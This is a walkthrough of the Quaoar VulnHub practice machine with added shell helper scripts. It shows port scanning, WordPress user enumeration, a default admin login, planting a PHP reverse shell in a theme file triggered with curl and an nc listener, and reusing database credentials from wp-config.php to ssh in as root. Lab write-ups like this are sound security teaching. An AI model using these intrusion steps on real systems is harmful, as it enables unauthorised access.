Quaoar

This is my writeup for the Quaoar VM from vulnhub.com. This machine is intended to be doable by someone who is interested in learning computer security. There are 3 flags on this machine:

  1. Get a shell
  2. Get root access
  3. There is a post exploitation flag on the box

Intelligence Gathering

Let's start scanning. I run my own recon script, which wraps nmap and nikto:

Recon

The interesting findings are:

  • Open ports:
    • 22/tcp
    • 53/tcp
    • 80/tcp
    • 110/tcp
    • 139/tcp
    • 143/tcp
    • 445/tcp
    • 993/tcp
    • 995/tcp
    • 53/udp
    • 137/udp
    • 5353/udp
  • PHP 5.3.10-1ubuntu3
  • /wordpress/
  • Apache/2.2.22
  • Apache mod_negotiation is enabled
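As an added example (not the author's recon script), here is a small POSIX shell version of the nmap + nikto combination described above: it parses nmap's grepable (-oG) output for open ports and hands every HTTP-looking port to nikto. The target, the output file names and the sample scan written by write_sample_gnmap are constructed for this example; only the recon function touches the network.

```shell
#!/bin/sh
# Added example (not the author's recon script): nmap + nikto glued together,
# with a parser for nmap's grepable (-oG) output to pick the ports nikto gets.
# Target, output file names and the sample written by write_sample_gnmap are
# constructed for this example.

# open_ports FILE -> "port/proto service", one line per port that nmap reports
# as open in a -oG file. Each grepable port entry has the shape
#   80/open/tcp//http//Apache httpd 2.2.22/
# i.e. port/state/proto/owner/service/rpcinfo/version, comma separated after
# "Ports:". State "open|filtered" (common for UDP) is deliberately skipped.
open_ports() {
    sed -n 's/.*Ports: //p' "$1" | tr ',' '\n' | sed 's/^ *//' |
        awk -F/ '$2 == "open" { printf "%s/%s %s\n", $1, $3, $5 }'
}

# web_ports FILE -> bare port numbers whose service name contains "http"
# (or 80/443 when nmap could not name the service): the nikto candidates.
web_ports() {
    open_ports "$1" | awk '
        $2 ~ /http/ || $1 == "80/tcp" || $1 == "443/tcp" {
            split($1, p, "/"); print p[1]
        }'
}

# recon TARGET: full TCP port scan with version detection, a quick UDP scan,
# then nikto against every web port found. The only function that touches
# the network.
recon() {
    out="recon-$1"
    nmap -sV -p- -oG "$out-tcp.gnmap" -oN "$out-tcp.nmap" "$1"
    nmap -sU --top-ports 50 -oG "$out-udp.gnmap" -oN "$out-udp.nmap" "$1"
    for port in $(web_ports "$out-tcp.gnmap"); do
        nikto -h "http://$1:$port" -output "$out-nikto-$port.txt"
    done
}

# write_sample_gnmap FILE: constructed -oG output listing the ports found on
# Quaoar; the second "Ports:" line stands in for the separate UDP scan.
write_sample_gnmap() {
    cat > "$1" <<'EOF'
# Nmap scan initiated as: nmap -sV -p- -oG quaoar-tcp.gnmap __IP__
Host: __IP__ ()  Status: Up
Host: __IP__ ()  Ports: 22/open/tcp//ssh///, 53/open/tcp//domain///, 80/open/tcp//http//Apache httpd 2.2.22/, 110/open/tcp//pop3///, 139/open/tcp//netbios-ssn///, 143/open/tcp//imap///, 445/open/tcp//microsoft-ds///, 993/open/tcp//imaps///, 995/open/tcp//pop3s///  Ignored State: closed (65526)
Host: __IP__ ()  Ports: 53/open/udp//domain///, 137/open/udp//netbios-ns///, 5353/open|filtered/udp//zeroconf///
# Nmap done
EOF
}
```

Run `recon __IP__` for the real thing; `write_sample_gnmap x.gnmap; open_ports x.gnmap; web_ports x.gnmap` shows what the parser makes of the Quaoar port list (only port 80 goes to nikto).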

WordPress

With WPScan (ruby wpscan --url __HOST__ --enumerate u) I identified the following two users:

  • admin
  • wpuser

Let's try some standard passwords. Oops, admin/admin actually worked. I did not expect this to work.

Exploitation

Placing a reverse shell

I did the same thing as for the Mr Robot 1 VM: I logged into WordPress and put an edited version of the PHP reverse shell into header.php of the Twenty Fourteen theme. Because header.php is included by every front-end page, any request to the site fires the payload, so the listener has to be up before the file is requested.

I then started a listener on port 42 on my local machine:

nc -lvp 42

Then I triggered the reverse shell by requesting the edited file (curl will not return while the shell is connected):
curl http://__IP__/wordpress/wp-content/themes/twentyfourteen/header.php

Wait for the reverse shell to connect:

Reverse shell

Poke around and read the first flag:

$ cat /home/wpadmin/flag.txt
2bafe61f03117ac66a73c3c514de796e

Checking the cron jobs turns up the second flag, hidden in a comment in /etc/cron.d/php5:

$ cat /etc/cron.d/php5
# /etc/cron.d/php5: crontab fragment for php5
#  This purges session files older than X, where X is defined in seconds
#  as the largest value of session.gc_maxlifetime from all your php.ini
#  files, or 24 minutes if not defined.  See /usr/lib/php5/maxlifetime
# Its always a good idea to check for crontab to learn more about the operating system good job you get 50! - d46795f84148fd338603d0d6a9dbf8de
# Look for and purge old sessions every 30 minutes
09,39 *     * * *     root   [ -x /usr/lib/php5/maxlifetime ] && [ -d /var/lib/php5 ] && find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin +$(/usr/lib/php5/maxlifetime) ! -execdir fuser -s {} 2>/dev/null \; -delete
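Cron is worth reading for more than flags: a job that runs as root and executes something the current user can write to is a privilege-escalation path. The writeup did not need one on Quaoar, but as an added example (not from the writeup) the following shell functions enumerate /etc/cron.d-style files and flag root jobs whose command mentions a writable file or directory. The cron files are parameters; the only thing taken from the page is the shape of the php5 fragment.

```shell
#!/bin/sh
# Added example (not from the writeup): enumerate system cron jobs and flag
# root jobs that run or reference something the current user can write to.
# Works on /etc/crontab and /etc/cron.d/* style files (the ones with a user
# column); user crontabs from "crontab -l" have no user column.

# cron_jobs FILE... -> "user command" for every job line, skipping comments,
# blank lines and VAR=value assignments (SHELL=, PATH=, MAILTO=, ...).
cron_jobs() {
    cat "$@" | awk '
        /^[ \t]*#/ || NF == 0 { next }          # comment or blank line
        /^[A-Za-z_][A-Za-z0-9_]*=/ { next }     # environment assignment
        {
            # @reboot/@daily lines have one schedule field, normal lines five
            n = ($1 ~ /^@/) ? 1 : 5
            user = $(n + 1)
            cmd = ""
            for (i = n + 2; i <= NF; i++) cmd = cmd (i > n + 2 ? " " : "") $i
            print user, cmd
        }'
}

# writable_paths CMD -> absolute paths mentioned in CMD that exist as a
# regular file or directory and are writable by the current user.
# (Devices such as /dev/null are ignored: world-writable but uninteresting.)
writable_paths() {
    printf '%s\n' "$1" | grep -o '/[^ ;&|<>()]*' | sort -u |
        while IFS= read -r p; do
            if [ -w "$p" ] && { [ -f "$p" ] || [ -d "$p" ]; }; then
                printf '%s\n' "$p"
            fi
        done
    return 0
}

# root_jobs_with_writable_paths FILE... -> "command -> path" for every root
# job whose command line mentions a writable path. A writable script or a
# writable directory that the job processes (like /var/lib/php5/ above) is
# the thing to look at next.
root_jobs_with_writable_paths() {
    cron_jobs "$@" | while read -r user cmd; do
        [ "$user" = "root" ] || continue
        for p in $(writable_paths "$cmd"); do
            printf '%s -> %s\n' "$cmd" "$p"
        done
    done
}
```

On a live box: `root_jobs_with_writable_paths /etc/crontab /etc/cron.d/*`. An empty result is the normal case; anything listed is a candidate, not yet an exploit, because the job may only read the path.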

Getting root

After grabbing the second flag, I checked the webroot. While reading the files, the database credentials in wp-config.php stood out:

$ cat /var/www/wordpress/wp-config.php

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

This looks like the root password. And indeed, it is reused for the system root account, and ssh accepts it. The final flag, 8e3f9ec016e3598c5eec11fd3d73f6fb, lies there as well.

ssh root@__IP__

Root
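As an added example (not the author's commands), the credential-reuse check from this section as shell functions: wp_config_value pulls a define() out of wp-config.php, is_local_account checks whether the database user is also a Unix account on the box, and check_reuse is the manual step the writeup performed (ssh as that user with the database password). The sample config written by write_sample_wp_config is constructed; its define() lines mirror the ones shown above.

```shell
#!/bin/sh
# Added example (not the author's commands): extract the database credentials
# from a wp-config.php and decide whether they are worth trying for password
# reuse, as happened on Quaoar. The config path and target host are
# parameters; write_sample_wp_config produces a constructed sample.

# wp_config_value FILE NAME -> the value of define('NAME', '...') in FILE,
# accepting single or double quotes and arbitrary spacing. A value that
# itself contains a quote character is not handled.
wp_config_value() {
    grep -E "^[[:space:]]*define[[:space:]]*\([[:space:]]*['\"]$2['\"]" "$1" |
        sed -E "s/^[^,]*,[[:space:]]*['\"](.*)['\"][[:space:]]*\)[[:space:]]*;.*$/\1/" |
        head -n 1
}

# wp_db_creds FILE -> "user:password@host"
wp_db_creds() {
    printf '%s:%s@%s\n' "$(wp_config_value "$1" DB_USER)" \
        "$(wp_config_value "$1" DB_PASSWORD)" "$(wp_config_value "$1" DB_HOST)"
}

# is_local_account USER -> 0 if USER is also a Unix account on this host,
# i.e. the database password is a candidate for su/ssh as that user.
is_local_account() {
    grep -q "^$1:" /etc/passwd
}

# check_reuse FILE HOST: the manual step from the writeup. The database user
# on Quaoar was root, which always exists locally, so ssh is worth a try.
# This is the only function that touches the network.
check_reuse() {
    user=$(wp_config_value "$1" DB_USER)
    pass=$(wp_config_value "$1" DB_PASSWORD)
    if is_local_account "$user"; then
        echo "DB user '$user' is also a local account; trying ssh $user@$2 with the DB password"
        ssh "$user@$2"   # enter "$pass" at the prompt
    else
        echo "DB user '$user' is not a local account; try the password against the users in /etc/passwd instead"
    fi
}

# write_sample_wp_config FILE: constructed sample mirroring the Quaoar lines,
# with the quoting variations wp_config_value has to cope with.
write_sample_wp_config() {
    cat > "$1" <<'EOF'
<?php
// ** MySQL settings - You can get this info from your web host ** //
define('DB_NAME', 'wordpress');
define( "DB_USER" , "root" );
define('DB_PASSWORD', 'rootpassword!'); // trailing comment
define('DB_HOST', 'localhost');
EOF
}
```

From the foothold shell: `wp_db_creds /var/www/wordpress/wp-config.php` shows what was found, and `check_reuse /var/www/wordpress/wp-config.php __IP__` repeats the ssh attempt from the writeup.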

Learnings

I reorganized my stuff. My first intention was to save scripts per VM. With this, I realized I can reuse the PHP reverse shell from the Mr Robot 1 VM and the recon script as well, so I now have a folder called shared where my general scripts live.
